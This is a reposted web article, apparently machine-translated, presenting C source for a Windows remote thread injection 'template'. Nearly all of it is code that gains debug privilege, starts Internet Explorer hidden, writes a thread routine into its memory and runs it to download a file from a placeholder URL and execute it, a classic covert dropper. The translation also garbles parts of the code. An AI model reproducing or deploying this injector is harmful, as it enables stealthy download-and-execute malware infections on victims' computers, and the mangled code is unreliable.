Remote thread template (write the Execution Code to the target process)

Source: Internet
Author: User

This method directly writes ThreadProc, The CreateRemoteThread thread process function, to the target process, typical Elevation of Privilege-> opening a process-> Applying for space in the target process-> writing thread code-> CreateRemoteThread

# Include <tlhelp32.h>
# Include <stdio. h>
# Include <urlmon. h>
# Pragma comment (lib, "urlmon. lib ")
# Include <shellapi. h>

Typedef struct _ RemotePara
{
// Download the object url
Char Url [255];
// Save the file path
Char FilePath [255];
// URL of the URLDownloadToFile Function
DWORD DownAddr;
// Address of the WinexeC Function
DWORD ExecAddr;
} RemotePara;

DWORD _ stdcall ThreadProc (RemotePara * lpPara)
{
Typedef UINT (_ stdcall * MWinExec) (maid, UINT uCmdShow );
Typedef HRESULT (_ stdcall * MURLDownloadToFile) (LPUNKNOWN pCaller,
LPCTSTR szURL, LPCTSTR szFileName,
DWORD dwReserved, LPBINDSTATUSCALLBACK lpfnCB );
MURLDownloadToFile myURLDownloadToFile;
// Obtain the URL of the URLDownloadToFile function from the structure.
MyURLDownloadToFile = (MURLDownloadToFile) lpPara-> DownAddr;
// Call the function to download the object
MyURLDownloadToFile (0, lpPara-> Url, lpPara-> FilePath, 0, 0 );
MWinExec myWinExec;
// Obtain the WinexeC function address from the structure
MyWinExec = (MWinExec) lpPara-> ExecAddr;
// Call the function to run the downloaded file
MyWinExec (lpPara-> FilePath, 1 );
Return 0;
}

DWORD GetProcessID (char * ProcessName)
{
PROCESSENTRY32 pe32;
Pe32.dwSize = sizeof (pe32 );
HANDLE hProcessSnap = createconlhelp32snapshot (TH32CS_SNAPPROCESS, 0 );
If (hProcessSnap = INVALID_HANDLE_VALUE)
{
Printf ("createconlhelp32snapshot error ");
Return 0;
}
BOOL bProcess = Process32First (hProcessSnap, & pe32 );
While (bProcess)
{
If (strcmp (strupr (pe32.szExeFile), strupr (ProcessName) = 0)
Return pe32.th32ProcessID;
BProcess = Process32Next (hProcessSnap, & pe32 );
}
CloseHandle (hProcessSnap );
Return 0;
}

Int EnableDebugPriv (const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
If (! OpenProcessToken (GetCurrentProcess (),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
& HToken ))
{
Printf ("OpenProcessToken error \ n ");
Return 1;
}
If (! LookupPrivilegeValue (NULL, name, & luid ))
{
Printf ("LookupPrivilege error! \ N ");
}
Tp. PrivilegeCount = 1;
Tp. Privileges [0]. Attributes = SE_PRIVILEGE_ENABLED;
Tp. Privileges [0]. Luid = luid;
If (! AdjustTokenPrivileges (hToken, 0, & tp, sizeof (TOKEN_PRIVILEGES), NULL, NULL ))
{
Printf ("AdjustTokenPrivileges error! \ N ");
Return 1;
}
Return 0;
}

BOOL Inject (const DWORD dwRemoteProcessId)
{
If (EnableDebugPriv (SE_DEBUG_NAME ))
{
Printf ("add privilege error ");
Return FALSE;
}
HANDLE hWnd = OpenProcess (PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId );
If (! HWnd)
{
Printf ("OpenProcess failed ");
Return FALSE;
}
// Apply for memory space
Void * pRemoteThread = VirtualAllocEx (hWnd, 0,
1024*4, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE );
If (! PRemoteThread)
{
Printf ("VirtualAllocEx failed ");

Return FALSE;
}
// Write the remote function into the memory
If (! WriteProcessMemory (hWnd, pRemoteThread, & ThreadProc, 1024 ))
{
Printf ("WriteProcessMemory failed ");
Return FALSE;
}
// Enter the RemotePara Structure
RemotePara myRemotePara;
ZeroMemory (& myRemotePara, sizeof (RemotePara ));
HINSTANCE hurlmon = LoadLibrary ("urlmon. dll ");
HINSTANCE kernel = LoadLibrary ("kernel32.dll ");
MyRemotePara. DownAddr = (DWORD) GetProcAddress (hurlmon, "URLDownloadToFileA ");
MyRemotePara. ExecAddr = (DWORD) GetProcAddress (kernel, "WinExec ");
Char urlfile [255];
Strcpy (urlfile, "http: // xxx/1.exe ");
Strcpy (myRemotePara. Url, urlfile );
Strcpy (myRemotePara. FilePath, "c: \ a.exe ");
// Apply for memory space
RemotePara * pRemotePara = (RemotePara *) VirtualAllocEx (hWnd, 0, sizeof (RemotePara), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
If (! PRemotePara)
{
Printf ("VirtualAllocEx failed ");

Return FALSE;
}
// Write memory
If (! WriteProcessMemory (hWnd, pRemotePara, & myRemotePara, sizeof (myRemotePara), 0 ))
{
Printf ("WriteProcessMemory failed ");
Return FALSE;
}
// Create a thread
HANDLE hThread = CreateRemoteThread (hWnd, 0, 0, (LPTHREAD_START_ROUTINE) pRemoteThread, pRemotePara, 0, 0 );
If (! HThread)
{
Printf ("CreateRemoteThread failed ");

Return FALSE;
}
Return true;
}

Int APIENTRY WinMain (HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
Int nCmdShow)
{
Char Path [255];
GetSystemDirectory (Path, sizeof (Path ));
// Obtain the drive letter
Path [3] = 0x00;
Strcat (Path, "Program Files \ Internet Explorer \ ipolice.exe ");
WinExec (Path, SW_HIDE );
Sleep (1000 );
DWORD Pid = GetProcessID ("iexplore.exe ");
Inject (Pid );
Return 0;
}

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.